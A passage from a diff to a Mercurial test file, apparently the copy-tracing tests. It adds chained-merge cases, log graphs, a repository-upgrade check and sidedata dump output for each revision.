'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBC+revert,Lm: $case_desc" + +(Merge variant 2) + + $ hg up 'desc("mCB-revert-m")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mCB+revert,Lm: $case_desc" + +(Merge variant 3) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,BC+revertm: $case_desc" + created new head + +(Merge variant 4) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mCB-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,CB+revertm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))' + @ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + |\ + | | o mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + | |/| + +-+---o mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | | | + | +---o mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | | |/ + | o | l-1: unrelated changes (based on "c" changes) + | | | + | | o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + | |/| + o---+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + |/ / + o | c-1 delete d | | - o | 1 i-1: a -move-> c + | o b-1: b update |/ - o 0 i-0 initial commit: a b h + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` + +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. + + $ case_desc="chained merges (copy-overwrite -> simple) - same content" + +(extra unrelated changes) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo n > unrelated-n + $ hg add unrelated-n + $ hg ci -m 'n-1: unrelated changes (based on the "f" series of changes)' + created new head + + $ hg up 'desc("g-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo o > unrelated-o + $ hg add unrelated-o + $ hg ci -m 'o-1: unrelated changes (based on "g" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mFGm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("o-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mFG,Om: $case_desc" + +(merge variant 2) + + $ hg up 'desc("o-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("FGm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mO,FGm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mGFm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mGF,Nm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mGFm")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mN,GFm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))' + @ mN,GFm: chained merges (copy-overwrite -> simple) - same content + |\ + +---o mGF,Nm: chained merges (copy-overwrite -> simple) - same content + | |/ + | | o mO,FGm: chained merges (copy-overwrite -> simple) - same content + | | |\ + | | +---o mFG,Om: chained merges (copy-overwrite -> simple) - same content + | | | |/ + | | | o o-1: unrelated changes (based on "g" changes) + | | | | + | o | | n-1: unrelated changes (based on the "f" series of changes) + | | | | + o-----+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + |/ / / + | o / mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + |/|/ + | o g-1: update d + | | + o | f-2: rename i -> d + | | + o | f-1: rename h -> i + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: chaining conflicting rename resolution, with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +The "mEA-change-m-0" and "mAE-change-m-0" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + + $ case_desc="chained merges (conflict+change -> simple) - same content on both branch in the initial merge" + + +(merge variant 1) + + $ hg up 'desc("mAE-change-m")' + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE-change,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mAE-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mK,AE-change-m: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEA-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mEA-change,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mEA-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mJ,EA-change-m: $case_desc" + created new head + + + $ hg log -G --rev '::(desc("mAE-change,Km") + desc("mK,AE-change-m") + desc("mEA-change,Jm") + desc("mJ,EA-change-m"))' + @ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + |\ + +---o mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | |/ + | | o mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | | |\ + | | +---o mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | | | |/ + | | | o k-1: unrelated changes (based on "e" changes) + | | | | + | o | | j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |/ / / + | o / mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + |/|/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + Summary of all created cases ---------------------------- @@ -650,31 +1537,74 @@ f-2: rename i -> d g-1: update d h-1: b -(move)-> d - i-0 initial commit: a b h - i-1: a -move-> c - i-2: c -move-> d - mABm-0 simple merge - the other way - mAEm-0 simple merge - one way - mBAm-0 simple merge - one way - mBC-revert-m-0 - mBCm-0 simple merge - one way + i-0 initial commit: a b h p q r + i-1: a -move-> c, p -move-> s + i-2: c -move-> d, s -move-> t + j-1: unrelated changes (based on the "a" series of changes) + k-1: unrelated changes (based on "e" changes) + l-1: unrelated changes (based on "c" changes) + mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + mAE,Km: chained merges (conflict -> simple) - same content everywhere + mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d - mBDm-0 simple merge - one way - mBFm-0 simple merge - one way - mCB-revert-m-0 - mCBm-0 simple merge - the other way + mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d - mCGm-0 - mCH-delete-before-conflict-m-0 - mDBm-0 simple merge - the other way - mDGm-0 simple merge - one way - mEAm-0 simple merge - the other way - mFBm-0 simple merge - the other way - mFGm-0 simple merge - one way - mGCm-0 - mGDm-0 simple merge - the other way - mGFm-0 simple merge - the other way - mHC-delete-before-conflict-m-0 + mCGm-0 merge updated/deleted - revive the file (updated content) - one way + mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way + mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way + mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + mEA,Jm: chained merges (conflict -> simple) - same content everywhere + mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + mFG,Om: chained merges (copy-overwrite -> simple) - same content + mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + mGCm-0 merge updated/deleted - revive the file (updated content) - the other way + mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + mGF,Nm: chained merges (copy-overwrite -> simple) - same content + mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mJ,EAm: chained merges (conflict -> simple) - same content everywhere + mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mK,AEm: chained merges (conflict -> simple) - same content everywhere + mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + mN,GFm: chained merges (copy-overwrite -> simple) - same content + mO,FGm: chained merges (copy-overwrite -> simple) - same content + mPQ,Tm: chained merges (conflict -> simple) - different content + mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + mQP,Sm: chained merges (conflict -> simple) - different content + mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + mS,QPm: chained merges (conflict -> simple) - different content + mT,PQm: chained merges (conflict -> simple) - different content + n-1: unrelated changes (based on the "f" series of changes) + o-1: unrelated changes (based on "g" changes) + p-1: t -move-> u + p-2: u -move-> v + q-1 r -move-> w + q-2 w -move-> v + r-1: rename r -> x + r-2: rename t -> x + s-1: unrelated changes (based on the "p" series of changes) + t-1: unrelated changes (based on "q" changes) Test that sidedata computations during upgrades are correct @@ -698,9 +1628,10 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no yes no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: * (glob) compression-level: default default default @@ -709,7 +1640,48 @@ requirements preserved: * (glob) - added: exp-copies-sidedata-changeset, exp-sidedata-flag + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag + + processed revlogs: + - all-filelogs + - changelog + - manifest + +#endif + +#if upgraded-parallel + $ cat >> $HGRCPATH << EOF + > [format] + > exp-use-side-data = yes + > exp-use-copies-side-data-changeset = yes + > [experimental] + > worker.repository-upgrade=yes + > [worker] + > enabled=yes + > numcpus=8 + > EOF + $ hg debugformat -v + format-variant repo config default + fncache: yes yes yes + dotencode: yes yes yes + generaldelta: yes yes yes + share-safe: no no no + sparserevlog: yes yes yes + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) + copies-sdc: no yes no + revlog-v2: no yes no + plain-cl-delta: yes yes yes + compression: * (glob) + compression-level: default default default + $ hg debugupgraderepo --run --quiet + upgrade will perform the following actions: + + requirements + preserved: * (glob) + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -721,194 +1693,411 @@ #if no-compatibility no-filelog no-changeset + $ hg debugchangedfiles --compute 0 + added : a, ; + added : b, ; + added : h, ; + added : p, ; + added : q, ; + added : r, ; + $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do - > echo "##### revision $rev #####" + > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'` + > echo "##### revision \"$case_id\" #####" > hg debugsidedata -c -v -- $rev > hg debugchangedfiles $rev > done - ##### revision 0 ##### + ##### revision "i-0 initial commit" ##### 1 sidedata entries - entry-0014 size 34 - '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh' + entry-0014 size 64 + '\x00\x00\x00\x06\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00abhpqr' added : a, ; added : b, ; added : h, ; - ##### revision 1 ##### + added : p, ; + added : q, ; + added : r, ; + ##### revision "i-1" ##### 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02acps' removed : a, ; added p1: c, a; - ##### revision 2 ##### + removed : p, ; + added p1: s, p; + ##### revision "i-2" ##### 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd' + entry-0014 size 44 + '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02cdst' removed : c, ; added p1: d, c; - ##### revision 3 ##### + removed : s, ; + added p1: t, s; + ##### revision "a-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00de' removed : d, ; added p1: e, d; - ##### revision 4 ##### + ##### revision "a-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ef' removed : e, ; added p1: f, e; - ##### revision 5 ##### + ##### revision "b-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00b' touched : b, ; - ##### revision 6 ##### + ##### revision "c-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 7 ##### + ##### revision "d-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 8 ##### + ##### revision "d-2 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 9 ##### + ##### revision "e-1 b -move-> g" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bg' removed : b, ; added p1: g, b; - ##### revision 10 ##### + ##### revision "e-2 g -move-> f" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg' added p1: f, g; removed : g, ; - ##### revision 11 ##### + ##### revision "p-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00tu' + removed : t, ; + added p1: u, t; + ##### revision "p-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv' + removed : u, ; + added p1: v, u; + ##### revision "q-1 r -move-> w" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rw' + removed : r, ; + added p1: w, r; + ##### revision "q-2 w -move-> v" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00vw' + added p1: v, w; + removed : w, ; + ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 12 ##### + ##### revision "mABm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 13 ##### + ##### revision "mBCm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 14 ##### + ##### revision "mBCm-1 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 15 ##### + ##### revision "mCBm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 16 ##### + ##### revision "mCBm-1 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 17 ##### + ##### revision "mBDm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 18 ##### + ##### revision "mDBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 19 ##### + ##### revision "mAEm-0 merge with copies info on both side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 20 ##### + ##### revision "mEAm-0 merge with copies info on both side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 21 ##### + ##### revision "mPQm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; + ##### revision "mQPm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; + ##### revision "f-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00hi' removed : h, ; added p1: i, h; - ##### revision 22 ##### + ##### revision "f-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00di' touched p1: d, i; removed : i, ; - ##### revision 23 ##### + ##### revision "mBFm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mFBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 24 ##### + ##### revision "r-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rx' + removed : r, ; + added p1: x, r; + ##### revision "r-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00tx' + touched p1: t, x; + removed : x, ; + ##### revision "mBRm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 25 ##### + ##### revision "mRBm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "g-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' touched : d, ; - ##### revision 26 ##### - 1 sidedata entries - entry-0014 size 14 - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' - merged : d, ; - ##### revision 27 ##### + ##### revision "mDGm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 28 ##### + ##### revision "mGDm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 29 ##### + ##### revision "mFGm-0 merge - G side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 30 ##### + ##### revision "mGFm-0 merge - G side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' + merged : d, ; + ##### revision "mCGm-0 merge updated/deleted - revive the file (updated content) - one way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 31 ##### + ##### revision "mGCm-0 merge updated/deleted - revive the file (updated content) - the other way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 32 ##### + ##### revision "mCB-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 33 ##### + ##### revision "mBC-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 34 ##### + ##### revision "h-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bd' removed : b, ; added p1: d, b; - ##### revision 35 ##### + ##### revision "mCH-delete-before-conflict-m-0 simple merge - C side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mHC-delete-before-conflict-m-0 simple merge - C side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mAE-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; + ##### revision "mEA-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; + ##### revision "mBF-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; + ##### revision "mFB-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; + ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; + ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; + ##### revision "j-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + added : unrelated-j, ; + ##### revision "k-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k' + added : unrelated-k, ; + ##### revision "mAE,Km" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mK,AEm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 36 ##### + ##### revision "mEA,Jm" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; + ##### revision "mJ,EAm" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; + ##### revision "s-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-s' + added : unrelated-s, ; + ##### revision "t-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-t' + added : unrelated-t, ; + ##### revision "mPQ,Tm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mT,PQm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mQP,Sm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mS,QPm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "l-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l' + added : unrelated-l, ; + ##### revision "mBC+revert,Lm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mCB+revert,Lm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mL,BC+revertm" ##### + 1 sidedata 